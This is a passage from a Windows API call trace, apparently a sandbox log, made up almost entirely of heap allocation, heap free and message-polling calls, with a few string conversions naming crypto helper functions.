dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0164.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0164.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0164.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0164.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0164.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8a16) returned 0x9edbb0 [0164.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9e5190 | out: hHeap=0x8a0000) returned 1 [0164.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0164.565] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0164.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0164.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0164.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0164.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0164.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8a16) returned 0x9e5190 [0164.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0164.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9e5190 | out: hHeap=0x8a0000) returned 1 [0164.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0164.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0164.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0164.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0164.565] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0164.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0164.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0164.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0164.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0164.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0164.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0164.566] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0164.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0164.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0164.566] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0164.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0164.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0164.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0164.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2678 [0164.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0164.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0164.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0164.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0164.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8a16) returned 0x9e5190 [0164.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0164.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2698 [0164.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0164.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0164.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0164.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2768 [0164.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0164.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0164.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0164.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27f8 [0164.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0164.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0164.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0164.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba288 [0164.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0164.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0164.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0164.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0164.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0164.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8a16) returned 0x9f65d0 [0164.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0164.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0164.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0164.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0164.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0164.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0164.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0164.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0164.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0164.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0164.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0164.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0164.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0164.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0164.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0164.568] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0164.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0164.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0164.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0164.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0164.568] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0164.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0164.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0164.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0164.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0164.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0164.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0164.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0164.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0164.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0164.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0164.568] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0164.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0164.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0164.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0164.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2888 [0164.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0164.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0164.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0164.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0164.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd390 [0164.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0164.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0164.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0164.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0164.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0164.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0164.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0164.569] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0164.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0164.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0164.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0164.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0164.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0164.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0164.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0164.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0164.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0164.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0164.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0164.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0164.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0164.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0164.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0164.569] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0164.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0164.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0164.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0164.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0164.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0164.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0164.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0164.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0164.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0164.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0164.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0164.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0164.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0164.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0164.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0164.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0164.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0164.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0164.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0164.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0164.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0164.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0164.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0164.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0164.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0164.570] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0164.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0164.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0164.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0164.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0164.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0164.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0164.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0164.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0164.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0164.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0164.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0164.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0164.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0164.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0164.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0164.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0164.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0164.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0164.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0164.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0164.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0164.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0164.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0164.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0164.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0164.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0164.571] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0164.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0164.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0164.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0164.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0164.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0164.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0164.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0164.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0164.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0164.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0164.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0164.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0164.572] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0164.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0164.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3f0 [0164.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0164.572] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0164.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0164.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0164.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0164.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0164.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0164.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0164.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0164.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0164.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0164.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0164.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0164.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0164.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0164.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0164.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0164.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0164.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0164.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0164.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0164.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0164.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0164.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0164.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0164.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0164.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0164.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0164.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0164.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0164.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0164.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0164.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0164.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0164.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0164.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0164.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0164.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0164.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0164.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0164.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0164.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0164.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0164.577] RtlAllocateHeap 